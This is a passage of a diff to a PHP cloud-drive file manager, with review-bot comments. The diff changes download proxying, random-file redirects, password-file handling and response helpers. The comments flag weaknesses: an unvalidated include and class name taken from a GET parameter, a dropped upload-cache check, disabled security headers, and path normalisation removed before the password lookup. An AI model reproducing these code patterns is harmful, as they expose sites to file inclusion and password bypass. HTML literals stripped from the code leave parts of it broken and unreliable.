+', 308, [ 'Location' => $tmp ]); + } + + if ($_GET['json']) { + // return a json + if ($files['type']=='folder' && !$_SERVER['admin']) { + foreach ($files['list'] as $k => $v) { + if (isHideFile($k)) unset($files['list'][$k]); + } + } + return output(json_encode($files), 200, ['Content-Type' => 'application/json']); + } + // random file + if (isset($_GET['random'])) + if ($_GET['random']!==true) { if ($_SERVER['ishidden']<4) { + if (!isset($files['list'])) { + $distfolder = splitlast($path, '/'); + if ($distfolder[1]=='') $tmpfolder = splitlast($distfolder[0], '/')[1]; + else $tmpfolder = $distfolder[1]; + if ($tmpfolder=='') $tmpfolder = '/'; + return output('No files in folder " ' . htmlspecialchars($tmpfolder) . ' ".', 404); + } $tmp = []; - foreach (array_keys($files['children']) as $filename) { - if (strtolower(splitlast($filename,'.')[1])==strtolower($_GET['random'])) $tmp[$filename] = $files['children'][$filename][$_SERVER['DownurlStrName']]; + foreach (array_keys($files['list']) as $filename) { + if (strtolower(splitlast($filename, '.')[1])==strtolower($_GET['random'])) $tmp[$filename] = $files['list'][$filename]['url']; } $tmp = array_values($tmp); if (count($tmp)>0) { - if (isset($_GET['url'])) return output($tmp[rand(0,count($tmp)-1)], 200); - return output('', 302, [ 'Location' => $tmp[rand(0,count($tmp)-1)] ]); - } else return output('',404); - } else return output('',401); - } - if (isset($files['file']) && !isset($_GET['preview'])) { - // is file && not preview mode - if ( $_SERVER['ishidden']<4 || (!!getConfig('downloadencrypt')&&$files['name']!=getConfig('passfile')) ) return output('', 302, [ 'Location' => $files[$_SERVER['DownurlStrName']] ]); - } - if ( isset($files['folder']) || isset($files['file']) ) { - return render_list($path, $files); - } else { - if (!isset($files['error'])) { - $files['error']['message'] = json_encode($files, JSON_PRETTY_PRINT); - $files['error']['code'] = 'unknownError'; - $files['error']['stat'] = 500; + $url = 
$tmp[rand(0, count($tmp)-1)]; + if (isset($_GET['url'])) return output($url, 200); + $header['Location'] = $url; + $domainforproxy = ''; + $domainforproxy = getConfig('domainforproxy', $_SERVER['disktag']); + if ($domainforproxy!='') { + $url = proxy_replace_domain($url, $domainforproxy, $header); + } + return output('', 302, $header); + } else return output('No "' . htmlspecialchars($_GET['random']) . '" files', 404); + } else return output('Hidden', 401); + } else return output('must provide a suffix, like "?random=gif".', 401); + + // is file && not preview mode, download file + if ($files['type']=='file' && !isset($_GET['preview'])) { + if ( $_SERVER['ishidden']<4 || (!!getConfig('downloadencrypt', $_SERVER['disktag'])&&$files['name']!=getConfig('passfile')) ) { + $url = $files['url']; + if ( strtolower(splitlast($files['name'], '.')[1])=='html' ) return output($files['content']['body'], $files['content']['stat']); + else { + if (isset($_SERVER['HTTP_IF_MODIFIED_SINCE']) && strtotime($files['time'])==strtotime($_SERVER['HTTP_IF_MODIFIED_SINCE'])) return output('', 304); + $fileConduitSize = getConfig('fileConduitSize', $_SERVER['disktag']); + $fileConduitCacheTime = getConfig('fileConduitCacheTime', $_SERVER['disktag']); + if (!!$fileConduitSize || !!$fileConduitCacheTime) { + if ($fileConduitSize>0) $fileConduitSize *= 1024*1024; + else $fileConduitSize = 1024*1024; + if ($fileConduitCacheTime>0) $fileConduitCacheTime *= 3600; + else $fileConduitCacheTime = 3600; + /*if ($_SERVER['HTTP_RANGE']!='') { + $header['Range'] = $_SERVER['HTTP_RANGE']; + + $response = curl('GET', $files['url'], '', $header, 1); + //return output($header['Range'] . json_encode($response['returnhead'])); + return output( + $response['body'], + $response['stat'], + $response['returnhead'], + //['Accept-Ranges' => 'bytes', 'Range' => $response['returnhead']['Range'], 'Content-Type' => $files['mime'], 'Cache-Control' => 'max-age=' . 
$fileConduitCacheTime], + false + ); + } else { + return output('', 206, + ['Accept-Ranges' => 'bytes', 'Content-Range' => 'bytes 0-0/' . $files['size'], 'Content-Type' => $files['mime'] ] + ); + }*/ + if ($files['size']<$fileConduitSize) return output( + base64_encode(file_get_contents($files['url'])), + 200, + [ + 'Accept-Ranges' => 'bytes', + //'access-control-allow-origin' => '*', + //'access-control-expose-headers' => 'Content-Length, WWW-Authenticate, Location, Accept-Ranges', + 'Content-Type' => $files['mime'], + 'Cache-Control' => 'max-age=' . $fileConduitCacheTime, + //'Cache-Control' => 'max-age=0', + 'Last-Modified' => gmdate('D, d M Y H:i:s T', strtotime($files['time'])) + ], + true + ); + } + if ($_SERVER['HTTP_RANGE']!='') $header['Range'] = $_SERVER['HTTP_RANGE']; + $header['Location'] = $url; + $domainforproxy = ''; + $domainforproxy = getConfig('domainforproxy', $_SERVER['disktag']); + if ($domainforproxy!='') { + $url = proxy_replace_domain($url, $domainforproxy, $header); + } + return output('', 302, $header); } - return message(''.getconstStr('Back').getconstStr('Home').'' . $files['error']['message'] . '
' . $files['error']['message'] . '
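Review bot: In the `AddDisk` branch, `$_GET['AddDisk']` is used unchecked both as a file name in `require 'disk' . $slash . $_GET['AddDisk'] . '.php';` and as a class name in `new $_GET['AddDisk'](...)`. The branch is limited to `$_SERVER['admin']`, but the value arrives as a plain GET parameter and should be validated before it selects a file to include, for example `if (!preg_match('/^[A-Za-z0-9_]+$/', $_GET['AddDisk'])) return output('', 400);`. The unauthenticated `del_upload_cache` action no longer checks for the `.tmp` suffix in main(); whether `$drive->del_upload_cache($path)` enforces it is not visible here and should be confirmed. In the `upsmallfile` block the `../` checks test `upbigfilename`, which looks copied from the big-file branch. The tail of this hunk is garbled on the page, so the end of main() could not be reviewed.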
' . json_encode($ispassfile, JSON_PRETTY_PRINT) . ''; - if (isset($ispassfile['file'])) { - $arr = curl_request($ispassfile[$_SERVER['DownurlStrName']]); + if ($ispassfile['type']=='file') { + $arr = curl('GET', $ispassfile['url']); if ($arr['stat']==200) { $passwordf=explode("\n",$arr['body']); $password=$passwordf[0]; - if ($password!='') $password=md5($password); - savecache('path_' . $path1 . '/?password', $password); - return $password; + if ($password==='') { + return ''; + } else { + $password=md5($password); + savecache('path_' . $path1 . '/?password', $password, $_SERVER['disktag']); + return $password; + } } else { //return md5('DefaultP@sswordWhenNetworkError'); return md5( md5(time()).rand(1000,9999) ); } } else { - savecache('path_' . $path1 . '/?password', 'null'); + savecache('path_' . $path1 . '/?password', 'null', $_SERVER['disktag']); if ($path !== '' ) { $path = substr($path,0,strrpos($path,'/')); return gethiddenpass($path,$passfile); @@ -657,37 +1000,94 @@ function get_timezone($timezone = '8') return $timezones[$timezone]; } -function message($message, $title = 'Message', $statusCode = 200) +function message($message, $title = 'Message', $statusCode = 200, $wainstat = 0) { - return output(' + $html = ' + ' . getconstStr('Back') . getconstStr('Home') . '
+
'; + if ($wainstat) { + $html .= ' + + '; + } else { + $html .= ' + '; + } + $html .= ' -', $statusCode); +'; + return output($html, $statusCode); } function needUpdate() { - $current_ver = file_get_contents(__DIR__ . '/version'); - $current_ver = substr($current_ver, strpos($current_ver, '.')+1); + global $slash; + $current_version = file_get_contents(__DIR__ . $slash . 'version'); + $current_ver = substr($current_version, strpos($current_version, '.')+1); $current_ver = explode(urldecode('%0A'),$current_ver)[0]; $current_ver = explode(urldecode('%0D'),$current_ver)[0]; - $github_version = file_get_contents('https://raw.githubusercontent.com/qkqpttgf/OneManager-php/master/version'); + $split = splitfirst($current_version, '.' . $current_ver)[0] . '.' . $current_ver; + if (!($github_version = getcache('github_version'))) { + //$tmp = curl('GET', 'https://raw.githubusercontent.com/qkqpttgf/OneManager-php/master/version'); + $tmp = curl('GET', 'https://git.hit.edu.cn/ysun/OneManager-php/-/raw/master/version'); + if ($tmp['stat']==0) return 0; + $github_version = $tmp['body']; + savecache('github_version', $github_version); + } $github_ver = substr($github_version, strpos($github_version, '.')+1); $github_ver = explode(urldecode('%0A'),$github_ver)[0]; $github_ver = explode(urldecode('%0D'),$github_ver)[0]; if ($current_ver != $github_ver) { - $_SERVER['github_version'] = $github_version; + //$_SERVER['github_version'] = $github_version; + $_SERVER['github_ver_new'] = splitfirst($github_version, $split)[0]; + $_SERVER['github_ver_old'] = splitfirst($github_version, $_SERVER['github_ver_new'])[1]; return 1; } return 0; 
@@ -695,6 +1095,10 @@ function needUpdate() function output($body, $statusCode = 200, $headers = ['Content-Type' => 'text/html'], $isBase64Encoded = false) { + if (isset($_SERVER['Set-Cookie'])) $headers['Set-Cookie'] = $_SERVER['Set-Cookie']; + if (baseclassofdrive()=='Aliyundrive') $headers['Referrer-Policy'] = 'no-referrer'; + //$headers['Referrer-Policy'] = 'same-origin'; + //$headers['X-Frame-Options'] = 'sameorigin'; return [ 'isBase64Encoded' => $isBase64Encoded, 'statusCode' => $statusCode, @@ -705,12 +1109,13 @@ function output($body, $statusCode = 200, $headers = ['Content-Type' => 'text/ht function passhidden($path) { - $path = str_replace('+','%2B',$path); - $path = str_replace('&','&', path_format(urldecode($path))); + if ($_SERVER['admin']) return 0; + //$path = str_replace('+','%2B',$path); + //$path = str_replace('&','&', path_format(urldecode($path))); if (getConfig('passfile') != '') { - $path = spurlencode($path,'/'); - if (substr($path,-1)=='/') $path=substr($path,0,-1); - $hiddenpass=gethiddenpass($path,getConfig('passfile')); + //$path = spurlencode($path,'/'); + //if (substr($path,-1)=='/') $path=substr($path,0,-1); + $hiddenpass=gethiddenpass($path, getConfig('passfile')); if ($hiddenpass != '') { return comppass($hiddenpass); } else { @@ -728,7 +1133,7 @@ function size_format($byte) while (abs($byte) >= 1024) { $byte = $byte / 1024; $i++; - if ($i == 3) break; + if ($i == 4) break; } $units = array('B', 'KB', 'MB', 'GB', 'TB'); $ret = round($byte, 2); 
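Review bot: The two hardening headers in output() are added only as commented-out lines, so every response except the Aliyundrive ones goes out without a Referrer-Policy and none carries X-Frame-Options. Since this function also serves the admin login form, I would enable `$headers['X-Frame-Options'] = 'sameorigin';` and a default `$headers['Referrer-Policy'] = 'same-origin';` (keeping `'no-referrer'` for Aliyundrive), or replace the dead lines with a comment naming the feature that needs framing or referrers. The new Set-Cookie pass-through copies `$_SERVER['Set-Cookie']` verbatim; where that value is built is outside this hunk, so it is worth confirming that it sets HttpOnly, Secure and SameSite. The function's return array continues past the end of the hunk.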
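Review bot: passhidden() no longer canonicalizes `$path` (the urldecode/path_format, spurlencode and trailing-slash steps are all commented out), so gethiddenpass() now builds its lookup and its cache key `'path_' . $path1 . '/?password'` from whatever form the caller passes. If any caller hands over an encoded path or one with a trailing slash (callers are outside this hunk), the password-file lookup can miss, or a differently spelled path can get its own cache entry, and the directory password could be skipped. I would state the precondition at the top of the function, e.g. `// $path must already be decoded, path_format()-normalized and without a trailing slash`, and delete the commented-out lines rather than keep them. The new `if ($_SERVER['admin']) return 0;` also reads a key that may be unset; `if (!empty($_SERVER['admin'])) return 0;` avoids the notice. The function body continues past the end of the hunk.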
@@ -737,219 +1142,197 @@ function size_format($byte) function time_format($ISO) { + if ($ISO=='') return date('Y-m-d H:i:s'); $ISO = str_replace('T', ' ', $ISO); $ISO = str_replace('Z', ' ', $ISO); - //return $ISO; return date('Y-m-d H:i:s',strtotime($ISO . " UTC")); } -function get_thumbnails_url($path = '/') +function adminform($name = '', $pass = '', $storage = '', $path = '') { - $path1 = path_format($path); - $path = path_format($_SERVER['list_path'] . path_format($path)); - if ($path!='/'&&substr($path,-1)=='/') $path=substr($path,0,-1); - $thumb_url = getcache('thumb_'.$path); - if ($thumb_url!='') return output($thumb_url); - $url = $_SERVER['api_url']; - if ($path !== '/') { - $url .= ':' . $path; - if (substr($url,-1)=='/') $url=substr($url,0,-1); - } - $url .= ':/thumbnails/0/medium'; - $files = json_decode(curl_request($url, false, ['Authorization' => 'Bearer ' . $_SERVER['access_token']])['body'], true); - if (isset($files['url'])) { - savecache('thumb_'.$path, $files['url']); - return output($files['url']); - } - return output('', 404); -} - -function bigfileupload($path) -{ - $path1 = path_format($_SERVER['list_path'] . path_format($path)); - if (substr($path1,-1)=='/') $path1=substr($path1,0,-1); - if ($_GET['upbigfilename']!=''&&$_GET['filesize']>0) { - $fileinfo['name'] = $_GET['upbigfilename']; - $fileinfo['size'] = $_GET['filesize']; - $fileinfo['lastModified'] = $_GET['lastModified']; - $filename = spurlencode( $fileinfo['name'] ); - $cachefilename = '.' . $fileinfo['lastModified'] . '_' . $fileinfo['size'] . '_' . $filename . '.tmp'; - $getoldupinfo=fetch_files(path_format($path . '/' . 
$cachefilename)); - //echo json_encode($getoldupinfo, JSON_PRETTY_PRINT); - if (isset($getoldupinfo['file'])&&$getoldupinfo['size']<5120) { - $getoldupinfo_j = curl_request($getoldupinfo[$_SERVER['DownurlStrName']]); - $getoldupinfo = json_decode($getoldupinfo_j['body'], true); - if ( json_decode( curl_request($getoldupinfo['uploadUrl'])['body'], true)['@odata.context']!='' ) return output($getoldupinfo_j['body'], $getoldupinfo_j['stat']); - } - if (!$_SERVER['admin']) $filename = spurlencode( $fileinfo['name'] ) . '.scfupload'; - $response=MSAPI('createUploadSession',path_format($path1 . '/' . $filename),'{"item": { "@microsoft.graph.conflictBehavior": "fail" }}',$_SERVER['access_token']); - $responsearry = json_decode($response['body'],true); - if (isset($responsearry['error'])) return output($response['body'], $response['stat']); - $fileinfo['uploadUrl'] = $responsearry['uploadUrl']; - MSAPI('PUT', path_format($path1 . '/' . $cachefilename), json_encode($fileinfo, JSON_PRETTY_PRINT), $_SERVER['access_token'])['body']; - return output($response['body'], $response['stat']); - } - return output('error', 400); -} - -function adminform($name = '', $pass = '', $path = '') -{ - $statusCode = 401; - $html = '